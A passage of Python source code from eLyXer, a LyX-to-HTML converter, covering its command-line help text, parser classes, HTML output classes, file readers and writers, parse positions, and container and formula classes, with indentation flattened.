if not Options.endfoot and not Options.marginfoot and not Options.hoverfoot:
Options.hoverfoot = True
if not Options.numberfoot and not Options.symbolfoot:
Options.letterfoot = True
def showoptions(self):
"Show all possible options"
Trace.error(' Common options:')
Trace.error(' --help: show this online help')
Trace.error(' --quiet: disables all runtime messages')
Trace.error('')
Trace.error(' Advanced options:')
Trace.error(' --debug: enable debugging messages (for developers)')
Trace.error(' --version: show version number and release date')
Trace.error(' --lyxformat: return the highest LyX version supported')
Trace.error(' Options for HTML output:')
Trace.error(' --title "title": set the generated page title')
Trace.error(' --css "file.css": use a custom CSS file')
Trace.error(' --embedcss "file.css": embed styles from a CSS file into the output')
Trace.error(' --favicon "icon.ico": insert the specified favicon in the header.')
Trace.error(' --html: output HTML 4.0 instead of the default XHTML')
Trace.error(' --unicode: full Unicode output')
Trace.error(' --iso885915: output a document with ISO-8859-15 encoding')
Trace.error(' --nofooter: remove the footer "generated by eLyXer"')
Trace.error(' --simplemath: do not generate fancy math constructions')
Trace.error(' Options for image output:')
Trace.error(' --directory "img_dir": look for images in the specified directory')
Trace.error(' --destdirectory "dest": put converted images into this directory')
Trace.error(' --imageformat ".ext": image output format, or "copy" to copy images')
Trace.error(' --noconvert: do not convert images, use in original locations')
Trace.error(' --converter "inkscape": use an alternative program to convert images')
Trace.error(' Options for footnote display:')
Trace.error(' --numberfoot: mark footnotes with numbers instead of letters')
Trace.error(' --symbolfoot: mark footnotes with symbols (*, **...)')
Trace.error(' --hoverfoot: show footnotes as hovering text (default)')
Trace.error(' --marginfoot: show footnotes on the page margin')
Trace.error(' --endfoot: show footnotes at the end of the page')
Trace.error(' --supfoot: use superscript for footnote markers (default)')
Trace.error(' --alignfoot: use aligned text for footnote markers')
Trace.error(' --footnotes "options": specify several comma-separated footnotes options')
Trace.error(' Available options are: "number", "symbol", "hover", "margin", "end",')
Trace.error(' "sup", "align"')
Trace.error(' Advanced output options:')
Trace.error(' --splitpart "depth": split the resulting webpage at the given depth')
Trace.error(' --tocfor "page": generate a TOC that points to the given page')
Trace.error(' --target "frame": make all links point to the given frame')
Trace.error(' --notoclabels: omit the part labels in the TOC, such as Chapter')
Trace.error(' --lowmem: do the conversion on the fly (conserve memory)')
Trace.error(' --raw: generate HTML without header or footer.')
Trace.error(' --mathjax remote: use MathJax remotely to display equations')
Trace.error(' --mathjax "URL": use MathJax from the given URL to display equations')
Trace.error(' --googlecharts: use Google Charts to generate formula images')
Trace.error(' --template "file": use a template, put everything in <!--$content-->')
Trace.error(' --copyright: add a copyright notice at the bottom')
Trace.error(' Deprecated options:')
Trace.error(' --toc: (deprecated) create a table of contents')
Trace.error(' --toctarget "page": (deprecated) generate a TOC for the given page')
Trace.error(' --nocopy: (deprecated) maintained for backwards compatibility')
Trace.error(' --jsmath "URL": use jsMath from the given URL to display equations')
sys.exit()
def showversion(self):
"Return the current eLyXer version string"
string = 'eLyXer version ' + GeneralConfig.version['number']
string += ' (' + GeneralConfig.version['date'] + ')'
Trace.error(string)
sys.exit()
def showhardversion(self):
"Return just the version string"
Trace.message(GeneralConfig.version['number'])
sys.exit()
def showversiondate(self):
"Return just the version dte"
Trace.message(GeneralConfig.version['date'])
sys.exit()
def showlyxformat(self):
"Return just the lyxformat parameter"
Trace.message(GeneralConfig.version['lyxformat'])
sys.exit()
class BranchOptions(object):
"A set of options for a branch"
def __init__(self, name):
self.name = name
self.options = {'color':'#ffffff'}
def set(self, key, value):
"Set a branch option"
if not key.startswith(ContainerConfig.string['startcommand']):
Trace.error('Invalid branch option ' + key)
return
key = key.replace(ContainerConfig.string['startcommand'], '')
self.options[key] = value
def isselected(self):
"Return if the branch is selected"
if not 'selected' in self.options:
return False
return self.options['selected'] == '1'
def __unicode__(self):
"String representation"
return 'options for ' + self.name + ': ' + unicode(self.options)
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Cloner(object):
"An object used to clone other objects."
def clone(cls, original):
"Return an exact copy of an object."
"The original object must have an empty constructor."
return cls.create(original.__class__)
def create(cls, type):
"Create an object of a given class."
clone = type.__new__(type)
clone.__init__()
return clone
clone = classmethod(clone)
create = classmethod(create)
class ContainerExtractor(object):
"A class to extract certain containers."
def __init__(self, config):
"The config parameter is a map containing three lists: allowed, copied and extracted."
"Each of the three is a list of class names for containers."
"Allowed containers are included as is into the result."
"Cloned containers are cloned and placed into the result."
"Extracted containers are looked into."
"All other containers are silently ignored."
self.allowed = config['allowed']
self.cloned = config['cloned']
self.extracted = config['extracted']
def extract(self, container):
"Extract a group of selected containers from elyxer.a container."
list = []
locate = lambda c: c.__class__.__name__ in self.allowed + self.cloned
recursive = lambda c: c.__class__.__name__ in self.extracted
process = lambda c: self.process(c, list)
container.recursivesearch(locate, recursive, process)
return list
def process(self, container, list):
"Add allowed containers, clone cloned containers and add the clone."
name = container.__class__.__name__
if name in self.allowed:
list.append(container)
elif name in self.cloned:
list.append(self.safeclone(container))
else:
Trace.error('Unknown container class ' + name)
def safeclone(self, container):
"Return a new container with contents only in a safe list, recursively."
clone = Cloner.clone(container)
clone.output = container.output
clone.contents = self.extract(container)
return clone
class Parser(object):
"A generic parser"
def __init__(self):
self.begin = 0
self.parameters = dict()
def parseheader(self, reader):
"Parse the header"
header = reader.currentline().split()
reader.nextline()
self.begin = reader.linenumber
return header
def parseparameter(self, reader):
"Parse a parameter"
if reader.currentline().strip().startswith('<'):
key, value = self.parsexml(reader)
self.parameters[key] = value
return
split = reader.currentline().strip().split(' ', 1)
reader.nextline()
if len(split) == 0:
return
key = split[0]
if len(split) == 1:
self.parameters[key] = True
return
if not '"' in split[1]:
self.parameters[key] = split[1].strip()
return
doublesplit = split[1].split('"')
self.parameters[key] = doublesplit[1]
def parsexml(self, reader):
"Parse a parameter in xml form: <param attr1=value...>"
strip = reader.currentline().strip()
reader.nextline()
if not strip.endswith('>'):
Trace.error('XML parameter ' + strip + ' should be <...>')
split = strip[1:-1].split()
if len(split) == 0:
Trace.error('Empty XML parameter <>')
return None, None
key = split[0]
del split[0]
if len(split) == 0:
return key, dict()
attrs = dict()
for attr in split:
if not '=' in attr:
Trace.error('Erroneous attribute for ' + key + ': ' + attr)
attr += '="0"'
parts = attr.split('=')
attrkey = parts[0]
value = parts[1].split('"')[1]
attrs[attrkey] = value
return key, attrs
def parseending(self, reader, process):
"Parse until the current ending is found"
if not self.ending:
Trace.error('No ending for ' + unicode(self))
return
while not reader.currentline().startswith(self.ending):
process()
def parsecontainer(self, reader, contents):
container = self.factory.createcontainer(reader)
if container:
container.parent = self.parent
contents.append(container)
def __unicode__(self):
"Return a description"
return self.__class__.__name__ + ' (' + unicode(self.begin) + ')'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class LoneCommand(Parser):
"A parser for just one command line"
def parse(self, reader):
"Read nothing"
return []
class TextParser(Parser):
"A parser for a command and a bit of text"
stack = []
def __init__(self, container):
Parser.__init__(self)
self.ending = None
if container.__class__.__name__ in ContainerConfig.endings:
self.ending = ContainerConfig.endings[container.__class__.__name__]
self.endings = []
def parse(self, reader):
"Parse lines as long as they are text"
TextParser.stack.append(self.ending)
self.endings = TextParser.stack + [ContainerConfig.endings['Layout'],
ContainerConfig.endings['Inset'], self.ending]
contents = []
while not self.isending(reader):
self.parsecontainer(reader, contents)
return contents
def isending(self, reader):
"Check if text is ending"
current = reader.currentline().split()
if len(current) == 0:
return False
if current[0] in self.endings:
if current[0] in TextParser.stack:
TextParser.stack.remove(current[0])
else:
TextParser.stack = []
return True
return False
class ExcludingParser(Parser):
"A parser that excludes the final line"
def parse(self, reader):
"Parse everything up to (and excluding) the final line"
contents = []
self.parseending(reader, lambda: self.parsecontainer(reader, contents))
return contents
class BoundedParser(ExcludingParser):
"A parser bound by a final line"
def parse(self, reader):
"Parse everything, including the final line"
contents = ExcludingParser.parse(self, reader)
# skip last line
reader.nextline()
return contents
class BoundedDummy(Parser):
"A bound parser that ignores everything"
def parse(self, reader):
"Parse the contents of the container"
self.parseending(reader, lambda: reader.nextline())
# skip last line
reader.nextline()
return []
class StringParser(Parser):
"Parses just a string"
def parseheader(self, reader):
"Do nothing, just take note"
self.begin = reader.linenumber + 1
return []
def parse(self, reader):
"Parse a single line"
contents = reader.currentline()
reader.nextline()
return contents
class InsetParser(BoundedParser):
"Parses a LyX inset"
def parse(self, reader):
"Parse inset parameters into a dictionary"
startcommand = ContainerConfig.string['startcommand']
while reader.currentline() != '' and not reader.currentline().startswith(startcommand):
self.parseparameter(reader)
return BoundedParser.parse(self, reader)
class ContainerOutput(object):
"The generic HTML output for a container."
def gethtml(self, container):
"Show an error."
Trace.error('gethtml() not implemented for ' + unicode(self))
def isempty(self):
"Decide if the output is empty: by default, not empty."
return False
class EmptyOutput(ContainerOutput):
def gethtml(self, container):
"Return empty HTML code."
return []
def isempty(self):
"This output is particularly empty."
return True
class FixedOutput(ContainerOutput):
"Fixed output"
def gethtml(self, container):
"Return constant HTML code"
return container.html
class ContentsOutput(ContainerOutput):
"Outputs the contents converted to HTML"
def gethtml(self, container):
"Return the HTML code"
html = []
if container.contents == None:
return html
for element in container.contents:
if not hasattr(element, 'gethtml'):
Trace.error('No html in ' + element.__class__.__name__ + ': ' + unicode(element))
return html
html += element.gethtml()
return html
class TaggedOutput(ContentsOutput):
"Outputs an HTML tag surrounding the contents."
tag = None
breaklines = False
empty = False
def settag(self, tag, breaklines=False, empty=False):
"Set the value for the tag and other attributes."
self.tag = tag
if breaklines:
self.breaklines = breaklines
if empty:
self.empty = empty
return self
def setbreaklines(self, breaklines):
"Set the value for breaklines."
self.breaklines = breaklines
return self
def gethtml(self, container):
"Return the HTML code."
if self.empty:
return [self.selfclosing(container)]
html = [self.open(container)]
html += ContentsOutput.gethtml(self, container)
html.append(self.close(container))
return html
def open(self, container):
"Get opening line."
if not self.checktag(container):
return ''
open = '<' + self.tag + '>'
if self.breaklines:
return open + '\n'
return open
def close(self, container):
"Get closing line."
if not self.checktag(container):
return ''
close = '</' + self.tag.split()[0] + '>'
if self.breaklines:
return '\n' + close + '\n'
return close
def selfclosing(self, container):
"Get self-closing line."
if not self.checktag(container):
return ''
selfclosing = '<' + self.tag + '/>'
if self.breaklines:
return selfclosing + '\n'
return selfclosing
def checktag(self, container):
"Check that the tag is valid."
if not self.tag:
Trace.error('No tag in ' + unicode(container))
return False
if self.tag == '':
return False
return True
class FilteredOutput(ContentsOutput):
"Returns the output in the contents, but filtered:"
"some strings are replaced by others."
def __init__(self):
"Initialize the filters."
self.filters = []
def addfilter(self, original, replacement):
"Add a new filter: replace the original by the replacement."
self.filters.append((original, replacement))
def gethtml(self, container):
"Return the HTML code"
result = []
html = ContentsOutput.gethtml(self, container)
for line in html:
result.append(self.filter(line))
return result
def filter(self, line):
"Filter a single line with all available filters."
for original, replacement in self.filters:
if original in line:
line = line.replace(original, replacement)
return line
class StringOutput(ContainerOutput):
"Returns a bare string as output"
def gethtml(self, container):
"Return a bare string"
return [container.string]
class LineReader(object):
"Reads a file line by line"
def __init__(self, filename):
if isinstance(filename, file):
self.file = filename
else:
self.file = codecs.open(filename, 'rU', 'utf-8')
self.linenumber = 1
self.lastline = None
self.current = None
self.mustread = True
self.depleted = False
try:
self.readline()
except UnicodeDecodeError:
# try compressed file
import gzip
self.file = gzip.open(filename, 'rb')
self.readline()
def setstart(self, firstline):
"Set the first line to read."
for i in range(firstline):
self.file.readline()
self.linenumber = firstline
def setend(self, lastline):
"Set the last line to read."
self.lastline = lastline
def currentline(self):
"Get the current line"
if self.mustread:
self.readline()
return self.current
def nextline(self):
"Go to next line"
if self.depleted:
Trace.fatal('Read beyond file end')
self.mustread = True
def readline(self):
"Read a line from elyxer.file"
self.current = self.file.readline()
if not isinstance(self.file, codecs.StreamReaderWriter):
self.current = self.current.decode('utf-8')
if len(self.current) == 0:
self.depleted = True
self.current = self.current.rstrip('\n\r')
self.linenumber += 1
self.mustread = False
Trace.prefix = 'Line ' + unicode(self.linenumber) + ': '
if self.linenumber % 1000 == 0:
Trace.message('Parsing')
def finished(self):
"Find out if the file is finished"
if self.lastline and self.linenumber == self.lastline:
return True
if self.mustread:
self.readline()
return self.depleted
def close(self):
self.file.close()
class LineWriter(object):
"Writes a file as a series of lists"
file = False
def __init__(self, filename):
if isinstance(filename, file):
self.file = filename
self.filename = None
else:
self.filename = filename
def write(self, strings):
"Write a list of strings"
for string in strings:
if not isinstance(string, basestring):
Trace.error('Not a string: ' + unicode(string) + ' in ' + unicode(strings))
return
self.writestring(string)
def writestring(self, string):
"Write a string"
if not self.file:
self.file = codecs.open(self.filename, 'w', "utf-8")
if self.file == sys.stdout and sys.version_info < (3, 0):
string = string.encode('utf-8')
self.file.write(string)
def writeline(self, line):
"Write a line to file"
self.writestring(line + '\n')
def close(self):
self.file.close()
class Globable(object):
"""A bit of text which can be globbed (lumped together in bits).
Methods current(), skipcurrent(), checkfor() and isout() have to be
implemented by subclasses."""
leavepending = False
def __init__(self):
self.endinglist = EndingList()
def checkbytemark(self):
"Check for a Unicode byte mark and skip it."
if self.finished():
return
if ord(self.current()) == 0xfeff:
self.skipcurrent()
def isout(self):
"Find out if we are out of the position yet."
Trace.error('Unimplemented isout()')
return True
def current(self):
"Return the current character."
Trace.error('Unimplemented current()')
return ''
def checkfor(self, string):
"Check for the given string in the current position."
Trace.error('Unimplemented checkfor()')
return False
def finished(self):
"Find out if the current text has finished."
if self.isout():
if not self.leavepending:
self.endinglist.checkpending()
return True
return self.endinglist.checkin(self)
def skipcurrent(self):
"Return the current character and skip it."
Trace.error('Unimplemented skipcurrent()')
return ''
def glob(self, currentcheck):
"Glob a bit of text that satisfies a check on the current char."
glob = ''
while not self.finished() and currentcheck():
glob += self.skipcurrent()
return glob
def globalpha(self):
"Glob a bit of alpha text"
return self.glob(lambda: self.current().isalpha())
def globnumber(self):
"Glob a row of digits."
return self.glob(lambda: self.current().isdigit())
def isidentifier(self):
"Return if the current character is alphanumeric or _."
if self.current().isalnum() or self.current() == '_':
return True
return False
def globidentifier(self):
"Glob alphanumeric and _ symbols."
return self.glob(self.isidentifier)
def isvalue(self):
"Return if the current character is a value character:"
"not a bracket or a space."
if self.current().isspace():
return False
if self.current() in '{}()':
return False
return True
def globvalue(self):
"Glob a value: any symbols but brackets."
return self.glob(self.isvalue)
def skipspace(self):
"Skip all whitespace at current position."
return self.glob(lambda: self.current().isspace())
def globincluding(self, magicchar):
"Glob a bit of text up to (including) the magic char."
glob = self.glob(lambda: self.current() != magicchar) + magicchar
self.skip(magicchar)
return glob
def globexcluding(self, excluded):
"Glob a bit of text up until (excluding) any excluded character."
return self.glob(lambda: self.current() not in excluded)
def pushending(self, ending, optional = False):
"Push a new ending to the bottom"
self.endinglist.add(ending, optional)
def popending(self, expected = None):
"Pop the ending found at the current position"
if self.isout() and self.leavepending:
return expected
ending = self.endinglist.pop(self)
if expected and expected != ending:
Trace.error('Expected ending ' + expected + ', got ' + ending)
self.skip(ending)
return ending
def nextending(self):
"Return the next ending in the queue."
nextending = self.endinglist.findending(self)
if not nextending:
return None
return nextending.ending
class EndingList(object):
"A list of position endings"
def __init__(self):
self.endings = []
def add(self, ending, optional = False):
"Add a new ending to the list"
self.endings.append(PositionEnding(ending, optional))
def pickpending(self, pos):
"Pick any pending endings from a parse position."
self.endings += pos.endinglist.endings
def checkin(self, pos):
"Search for an ending"
if self.findending(pos):
return True
return False
def pop(self, pos):
"Remove the ending at the current position"
if pos.isout():
Trace.error('No ending out of bounds')
return ''
ending = self.findending(pos)
if not ending:
Trace.error('No ending at ' + pos.current())
return ''
for each in reversed(self.endings):
self.endings.remove(each)
if each == ending:
return each.ending
elif not each.optional:
Trace.error('Removed non-optional ending ' + each)
Trace.error('No endings left')
return ''
def findending(self, pos):
"Find the ending at the current position"
if len(self.endings) == 0:
return None
for index, ending in enumerate(reversed(self.endings)):
if ending.checkin(pos):
return ending
if not ending.optional:
return None
return None
def checkpending(self):
"Check if there are any pending endings"
if len(self.endings) != 0:
Trace.error('Pending ' + unicode(self) + ' left open')
def __unicode__(self):
"Printable representation"
string = 'endings ['
for ending in self.endings:
string += unicode(ending) + ','
if len(self.endings) > 0:
string = string[:-1]
return string + ']'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class PositionEnding(object):
"An ending for a parsing position"
def __init__(self, ending, optional):
self.ending = ending
self.optional = optional
def checkin(self, pos):
"Check for the ending"
return pos.checkfor(self.ending)
def __unicode__(self):
"Printable representation"
string = 'Ending ' + self.ending
if self.optional:
string += ' (optional)'
return string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Position(Globable):
"""A position in a text to parse.
Including those in Globable, functions to implement by subclasses are:
skip(), identifier(), extract(), isout() and current()."""
def __init__(self):
Globable.__init__(self)
def skip(self, string):
"Skip a string"
Trace.error('Unimplemented skip()')
def identifier(self):
"Return an identifier for the current position."
Trace.error('Unimplemented identifier()')
return 'Error'
def extract(self, length):
"Extract the next string of the given length, or None if not enough text,"
"without advancing the parse position."
Trace.error('Unimplemented extract()')
return None
def checkfor(self, string):
"Check for a string at the given position."
return string == self.extract(len(string))
def checkforlower(self, string):
"Check for a string in lower case."
extracted = self.extract(len(string))
if not extracted:
return False
return string.lower() == self.extract(len(string)).lower()
def skipcurrent(self):
"Return the current character and skip it."
current = self.current()
self.skip(current)
return current
def __next__(self):
"Advance the position and return the next character."
self.skipcurrent()
return self.current()
if sys.version_info < (3, 0):
next = __next__
def checkskip(self, string):
"Check for a string at the given position; if there, skip it"
if not self.checkfor(string):
return False
self.skip(string)
return True
def error(self, message):
"Show an error message and the position identifier."
Trace.error(message + ': ' + self.identifier())
class TextPosition(Position):
"A parse position based on a raw text."
def __init__(self, text):
"Create the position from elyxer.some text."
Position.__init__(self)
self.pos = 0
self.text = text
self.checkbytemark()
def skip(self, string):
"Skip a string of characters."
self.pos += len(string)
def identifier(self):
"Return a sample of the remaining text."
length = 30
if self.pos + length > len(self.text):
length = len(self.text) - self.pos
return '*' + self.text[self.pos:self.pos + length] + '*'
def isout(self):
"Find out if we are out of the text yet."
return self.pos >= len(self.text)
def current(self):
"Return the current character, assuming we are not out."
return self.text[self.pos]
def extract(self, length):
"Extract the next string of the given length, or None if not enough text."
if self.pos + length > len(self.text):
return None
return self.text[self.pos : self.pos + length]
class FilePosition(Position):
"A parse position based on an underlying file."
def __init__(self, filename):
"Create the position from a file."
Position.__init__(self)
self.reader = LineReader(filename)
self.pos = 0
self.checkbytemark()
def skip(self, string):
"Skip a string of characters."
length = len(string)
while self.pos + length > len(self.reader.currentline()):
length -= len(self.reader.currentline()) - self.pos + 1
self.nextline()
self.pos += length
def currentline(self):
"Get the current line of the underlying file."
return self.reader.currentline()
def nextline(self):
"Go to the next line."
self.reader.nextline()
self.pos = 0
def linenumber(self):
"Return the line number of the file."
return self.reader.linenumber + 1
def identifier(self):
"Return the current line and line number in the file."
before = self.reader.currentline()[:self.pos - 1]
after = self.reader.currentline()[self.pos:]
return 'line ' + unicode(self.getlinenumber()) + ': ' + before + '*' + after
def isout(self):
"Find out if we are out of the text yet."
if self.pos > len(self.reader.currentline()):
if self.pos > len(self.reader.currentline()) + 1:
Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
self.nextline()
return self.reader.finished()
def current(self):
"Return the current character, assuming we are not out."
if self.pos == len(self.reader.currentline()):
return '\n'
if self.pos > len(self.reader.currentline()):
Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
return '*'
return self.reader.currentline()[self.pos]
def extract(self, length):
"Extract the next string of the given length, or None if not enough text."
if self.pos + length > len(self.reader.currentline()):
return None
return self.reader.currentline()[self.pos : self.pos + length]
class Container(object):
"A container for text and objects in a lyx file"
partkey = None
parent = None
begin = None
def __init__(self):
self.contents = list()
def process(self):
"Process contents"
pass
def gethtml(self):
"Get the resulting HTML"
html = self.output.gethtml(self)
if isinstance(html, basestring):
Trace.error('Raw string ' + html)
html = [html]
return self.escapeall(html)
def escapeall(self, lines):
"Escape all lines in an array according to the output options."
result = []
for line in lines:
if Options.html:
line = self.escape(line, EscapeConfig.html)
if Options.iso885915:
line = self.escape(line, EscapeConfig.iso885915)
line = self.escapeentities(line)
elif not Options.unicode:
line = self.escape(line, EscapeConfig.nonunicode)
result.append(line)
return result
def escape(self, line, replacements = EscapeConfig.entities):
"Escape a line with replacements from elyxer.a map"
pieces = sorted(replacements.keys())
# do them in order
for piece in pieces:
if piece in line:
line = line.replace(piece, replacements[piece])
return line
def escapeentities(self, line):
"Escape all Unicode characters to HTML entities."
result = ''
pos = TextPosition(line)
while not pos.finished():
if ord(pos.current()) > 128:
codepoint = hex(ord(pos.current()))
if codepoint == '0xd835':
codepoint = hex(ord(next(pos)) + 0xf800)
result += '&#' + codepoint[1:] + ';'
else:
result += pos.current()
pos.skipcurrent()
return result
def searchall(self, type):
"Search for all embedded containers of a given type"
list = []
self.searchprocess(type, lambda container: list.append(container))
return list
def searchremove(self, type):
"Search for all containers of a type and remove them"
list = self.searchall(type)
for container in list:
container.parent.contents.remove(container)
return list
def searchprocess(self, type, process):
"Search for elements of a given type and process them"
self.locateprocess(lambda container: isinstance(container, type), process)
def locateprocess(self, locate, process):
"Search for all embedded containers and process them"
for container in self.contents:
container.locateprocess(locate, process)
if locate(container):
process(container)
def recursivesearch(self, locate, recursive, process):
"Perform a recursive search in the container."
for container in self.contents:
if recursive(container):
container.recursivesearch(locate, recursive, process)
if locate(container):
process(container)
def extracttext(self):
"Extract all text from elyxer.allowed containers."
result = ''
constants = ContainerExtractor(ContainerConfig.extracttext).extract(self)
for constant in constants:
result += constant.string
return result
def group(self, index, group, isingroup):
"Group some adjoining elements into a group"
if index >= len(self.contents):
return
if hasattr(self.contents[index], 'grouped'):
return
while index < len(self.contents) and isingroup(self.contents[index]):
self.contents[index].grouped = True
group.contents.append(self.contents[index])
self.contents.pop(index)
self.contents.insert(index, group)
def remove(self, index):
"Remove a container but leave its contents"
container = self.contents[index]
self.contents.pop(index)
while len(container.contents) > 0:
self.contents.insert(index, container.contents.pop())
def tree(self, level = 0):
"Show in a tree"
Trace.debug(" " * level + unicode(self))
for container in self.contents:
container.tree(level + 1)
def getparameter(self, name):
"Get the value of a parameter, if present."
if not name in self.parameters:
return None
return self.parameters[name]
def getparameterlist(self, name):
"Get the value of a comma-separated parameter as a list."
paramtext = self.getparameter(name)
if not paramtext:
return []
return paramtext.split(',')
def hasemptyoutput(self):
"Check if the parent's output is empty."
current = self.parent
while current:
if current.output.isempty():
return True
current = current.parent
return False
def __unicode__(self):
"Get a description"
if not self.begin:
return self.__class__.__name__
return self.__class__.__name__ + '@' + unicode(self.begin)
if sys.version_info >= (3, 0):
__str__ = __unicode__
class BlackBox(Container):
"A container that does not output anything"
def __init__(self):
self.parser = LoneCommand()
self.output = EmptyOutput()
self.contents = []
class LyXFormat(BlackBox):
"Read the lyxformat command"
def process(self):
"Show warning if version < 276"
version = int(self.header[1])
if version < 276:
Trace.error('Warning: unsupported old format version ' + str(version))
if version > int(GeneralConfig.version['lyxformat']):
Trace.error('Warning: unsupported new format version ' + str(version))
class StringContainer(Container):
"A container for a single string"
parsed = None
def __init__(self):
self.parser = StringParser()
self.output = StringOutput()
self.string = ''
def process(self):
"Replace special chars from elyxer.the contents."
if self.parsed:
self.string = self.replacespecial(self.parsed)
self.parsed = None
def replacespecial(self, line):
"Replace all special chars from elyxer.a line"
replaced = self.escape(line, EscapeConfig.entities)
replaced = self.changeline(replaced)
if ContainerConfig.string['startcommand'] in replaced and len(replaced) > 1:
# unprocessed commands
if self.begin:
message = 'Unknown command at ' + unicode(self.begin) + ': '
else:
message = 'Unknown command: '
Trace.error(message + replaced.strip())
return replaced
def changeline(self, line):
line = self.escape(line, EscapeConfig.chars)
if not ContainerConfig.string['startcommand'] in line:
return line
line = self.escape(line, EscapeConfig.commands)
return line
def extracttext(self):
"Return all text."
return self.string
def __unicode__(self):
"Return a printable representation."
result = 'StringContainer'
if self.begin:
result += '@' + unicode(self.begin)
ellipsis = '...'
if len(self.string.strip()) <= 15:
ellipsis = ''
return result + ' (' + self.string.strip()[:15] + ellipsis + ')'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Constant(StringContainer):
"A constant string"
def __init__(self, text):
self.contents = []
self.string = text
self.output = StringOutput()
def __unicode__(self):
return 'Constant: ' + self.string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class TaggedText(Container):
"Text inside a tag"
output = None
def __init__(self):
self.parser = TextParser(self)
self.output = TaggedOutput()
def complete(self, contents, tag, breaklines=False):
"Complete the tagged text and return it"
self.contents = contents
self.output.tag = tag
self.output.breaklines = breaklines
return self
def constant(self, text, tag, breaklines=False):
"Complete the tagged text with a constant"
constant = Constant(text)
return self.complete([constant], tag, breaklines)
def __unicode__(self):
"Return a printable representation."
if not hasattr(self.output, 'tag'):
return 'Emtpy tagged text'
if not self.output.tag:
return 'Tagged <unknown tag>'
return 'Tagged <' + self.output.tag + '>'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class DocumentParameters(object):
"Global parameters for the document."
pdftitle = None
indentstandard = False
tocdepth = 10
startinglevel = 0
maxdepth = 10
language = None
bibliography = None
outputchanges = False
displaymode = False
class FormulaParser(Parser):
"Parses a formula"
def parseheader(self, reader):
"See if the formula is inlined"
self.begin = reader.linenumber + 1
type = self.parsetype(reader)
if not type:
reader.nextline()
type = self.parsetype(reader)
if not type:
Trace.error('Unknown formula type in ' + reader.currentline().strip())
return ['unknown']
return [type]
def parsetype(self, reader):
"Get the formula type from the first line."
if reader.currentline().find(FormulaConfig.starts['simple']) >= 0:
return 'inline'
if reader.currentline().find(FormulaConfig.starts['complex']) >= 0:
return 'block'
if reader.currentline().find(FormulaConfig.starts['unnumbered']) >= 0:
return 'block'
if reader.currentline().find(FormulaConfig.starts['beginbefore']) >= 0:
return 'numbered'
return None
def parse(self, reader):
"Parse the formula until the end"
formula = self.parseformula(reader)
while not reader.currentline().startswith(self.ending):
stripped = reader.currentline().strip()
if len(stripped) > 0:
Trace.error('Unparsed formula line ' + stripped)
reader.nextline()
reader.nextline()
return formula
def parseformula(self, reader):
"Parse the formula contents"
simple = FormulaConfig.starts['simple']
if simple in reader.currentline():
rest = reader.currentline().split(simple, 1)[1]
if simple in rest:
# formula is $...$
return self.parsesingleliner(reader, simple, simple)
# formula is multiline $...$
return self.parsemultiliner(reader, simple, simple)
if FormulaConfig.starts['complex'] in reader.currentline():
# formula of the form \[...\]
return self.parsemultiliner(reader, FormulaConfig.starts['complex'],
FormulaConfig.endings['complex'])
beginbefore = FormulaConfig.starts['beginbefore']
beginafter = FormulaConfig.starts['beginafter']
if beginbefore in reader.currentline():
if reader.currentline().strip().endswith(beginafter):
current = reader.currentline().strip()
endsplit = current.split(beginbefore)[1].split(beginafter)
startpiece = beginbefore + endsplit[0] + beginafter
endbefore = FormulaConfig.endings['endbefore']
endafter = FormulaConfig.endings['endafter']
endpiece = endbefore + endsplit[0] + endafter
return startpiece + self.parsemultiliner(reader, startpiece, endpiece) + endpiece
Trace.error('Missing ' + beginafter + ' in ' + reader.currentline())
return ''
begincommand = FormulaConfig.starts['command']
beginbracket = FormulaConfig.starts['bracket']
if begincommand in reader.currentline() and beginbracket in reader.currentline():
endbracket = FormulaConfig.endings['bracket']
return self.parsemultiliner(reader, beginbracket, endbracket)
Trace.error('Formula beginning ' + reader.currentline() + ' is unknown')
return ''
def parsesingleliner(self, reader, start, ending):
"Parse a formula in one line"
line = reader.currentline().strip()
if not start in line:
Trace.error('Line ' + line + ' does not contain formula start ' + start)
return ''
if not line.endswith(ending):
Trace.error('Formula ' + line + ' does not end with ' + ending)
return ''
index = line.index(start)
rest = line[index + len(start):-len(ending)]
reader.nextline()
return rest
def parsemultiliner(self, reader, start, ending):
"Parse a formula in multiple lines"
formula = ''
line = reader.currentline()
if not start in line:
Trace.error('Line ' + line.strip() + ' does not contain formula start ' + start)
return ''
index = line.index(start)
line = line[index + len(start):].strip()
while not line.endswith(ending):
formula += line + '\n'
reader.nextline()
line = reader.currentline()
formula += line[:-len(ending)]
reader.nextline()
return formula
class MacroParser(FormulaParser):
"A parser for a formula macro."
def parseheader(self, reader):
"See if the formula is inlined"
self.begin = reader.linenumber + 1
return ['inline']
def parse(self, reader):
"Parse the formula until the end"
formula = self.parsemultiliner(reader, self.parent.start, self.ending)
reader.nextline()
return formula
class FormulaBit(Container):
"A bit of a formula"
type = None
size = 1
original = ''
def __init__(self):
"The formula bit type can be 'alpha', 'number', 'font'."
self.contents = []
self.output = ContentsOutput()
def setfactory(self, factory):
"Set the internal formula factory."
self.factory = factory
return self
def add(self, bit):
"Add any kind of formula bit already processed"
self.contents.append(bit)
self.original += bit.original
bit.parent = self
def skiporiginal(self, string, pos):
"Skip a string and add it to the original formula"
self.original += string
if not pos.checkskip(string):
Trace.error('String ' + string + ' not at ' + pos.identifier())
def computesize(self):
"Compute the size of the bit as the max of the sizes of all contents."
if len(self.contents) == 0:
return 1
self.size = max([element.size for element in self.contents])
return self.size
def clone(self):
"Return a copy of itself."
return self.factory.parseformula(self.original)
def __unicode__(self):
"Get a string representation"
return self.__class__.__name__ + ' read in ' + self.original
if sys.version_info >= (3, 0):
__str__ = __unicode__
class TaggedBit(FormulaBit):
"A tagged string in a formula"
def constant(self, constant, tag):
"Set the constant and the tag"
self.output = TaggedOutput().settag(tag)
self.add(FormulaConstant(constant))
return self
def complete(self, contents, tag, breaklines = False):
"Set the constant and the tag"
self.contents = contents
self.output = TaggedOutput().settag(tag, breaklines)
return self
def selfcomplete(self, tag):
"Set the self-closing tag, no contents (as in <hr/>)."
self.output = TaggedOutput().settag(tag, empty = True)
return self
class FormulaConstant(Constant):
"A constant string in a formula"
def __init__(self, string):
"Set the constant string"
